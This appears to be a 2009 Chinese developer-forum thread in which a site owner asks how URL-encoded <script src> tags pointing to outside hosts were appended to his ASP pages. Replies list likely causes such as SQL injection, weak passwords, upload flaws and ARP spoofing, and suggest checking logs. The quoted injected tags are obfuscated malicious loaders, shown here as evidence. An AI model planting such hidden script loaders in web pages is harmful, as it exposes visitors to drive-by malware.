28,407
社区成员
发帖
与我相关
我的任务
分享如何植入的
如题,最近我的网站被挂马了。asp+access的网站。查看源文件,在一些源文件的底部</html>的后面多了<script src=http://%76%63%63%64%2E%63%6E></script>的代码。我想知道,黑我网站的人是怎样把这句话写入我的源文件里的呢?有点菜的问题,希望高手不吝赐教。
...全文
请发表友善的回复…
发表回复
Dogfish 2009-09-01
- 打赏
- 举报
一打开这个页面,我的电脑就警告。
方法类似
http://blog.csdn.net/dogfish/archive/2009/01/23/3851027.aspx
方法类似
http://blog.csdn.net/dogfish/archive/2009/01/23/3851027.aspx
Dogfish 2009-09-01
- 打赏
- 举报
sql注入。
coollele 2009-09-01
- 打赏
- 举报
我前段时遇到黑我网站的人不是写到源代码,而是写入数据库每个字段里,在网上查了查,是SQL注入; 后来通过日志查到他用的是二进制代码通过页面的录入框写入的;
一般的防SQL注入对它不起作用; 最后通过查检录入字符长度来限制;
问题解决.
一般的防SQL注入对它不起作用; 最后通过查检录入字符长度来限制;
问题解决.
凡夫与俗子 2009-09-01
- 打赏
- 举报
先排除局域网中毒
确定是自己网站以后
研究自己网站那些文件做了手脚
然后研究日志,看看有什么蛛丝马迹,顺藤摸瓜
确定是自己网站以后
研究自己网站那些文件做了手脚
然后研究日志,看看有什么蛛丝马迹,顺藤摸瓜
凡夫与俗子 2009-09-01
- 打赏
- 举报
N种可能。
例如,程序没有过滤传入字符
例如,后台使用弱密码
例如,上传没有过滤危险文件
例如,同服务器站点被黑
例如,同局域网中了arp,(加入源码没有这段,但网页上有,那一般就是这个。)
例如,程序没有过滤传入字符
例如,后台使用弱密码
例如,上传没有过滤危险文件
例如,同服务器站点被黑
例如,同局域网中了arp,(加入源码没有这段,但网页上有,那一般就是这个。)
fxcjy 2009-09-01
- 打赏
- 举报
有可能是主机漏洞
jypcxgzl 2009-09-01
- 打赏
- 举报
肯定你的网站哪儿有漏洞被利用了。
wxlkeepmoving 2009-09-01
- 打赏
- 举报
我的数据库没有被改变。只是我的源代码里多了这么一句<script src=http://%76%63%63%64%2E%63%6E> </script>,这是怎么回事呢?
如我的网页文件的结尾:
</body>
</html>
<script src=http://%77%2E%73%69%79%6F%75%2E%6F%72%67%2E%63%6E></script>。
结尾就是无缘无故的多了这么一句,黑我网站的人是怎么写入的呢?不明白?
如我的网页文件的结尾:
</body>
</html>
<script src=http://%77%2E%73%69%79%6F%75%2E%6F%72%67%2E%63%6E></script>。
结尾就是无缘无故的多了这么一句,黑我网站的人是怎么写入的呢?不明白?
hblhshb 2009-09-01
- 打赏
- 举报
如果有FSO组件权限的话写个循环,给你的所有.asp文件写入段代码是非常简单的
